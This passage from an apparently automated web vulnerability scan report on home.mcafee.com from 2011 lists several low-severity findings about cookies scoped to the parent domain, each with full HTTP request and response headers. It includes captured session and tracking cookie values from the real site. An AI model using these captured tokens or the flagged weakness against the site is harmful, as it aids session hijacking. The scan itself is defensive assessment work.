session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV9
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 36523
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.5. http://home.mcafee.com/AdviceCenter/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /AdviceCenter/Default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdviceCenter/Default.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/AdviceCenter/Default.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:00 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fAdviceCenter%2fDefault.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:19:00 GMT
Content-Length: 92200
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.6. http://home.mcafee.com/Default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Default.aspx?culture=ES-AR HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: s_vi=; path=/
Set-Cookie: s_nr=; path=/
Set-Cookie: s_cc=; path=/
Set-Cookie: CampaignId=; path=/
Set-Cookie: s_campaign=; path=/
Set-Cookie: SessionInfo=; path=/
Set-Cookie: s_sq=; path=/
Set-Cookie: CookieInformation=; path=/
Set-Cookie: lBounceURL=; path=/
Set-Cookie: s_ev8=; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lng=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: langid=96; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=62; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=62&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 34453
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.7. http://home.mcafee.com/Root/AboutUs.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Root/AboutUs.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Root/AboutUs.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/AboutUs.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fAboutUs.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:54 GMT
Content-Length: 34628
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.8. http://home.mcafee.com/Root/Support.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /Root/Support.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Root/Support.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/Root/Support.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:56 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fRoot%2fSupport.aspx&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV4
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 30428
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmldom" xmlns="http://www.w3.org/1999/xhtml" dir="ltr"
...[SNIP]...

13.9. http://home.mcafee.com/SiteMap.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://home.mcafee.com
Path:   /SiteMap.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SiteMap.aspx HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lBounceURL=http://home.mcafee.com/SiteMap.aspx; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:19:03 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
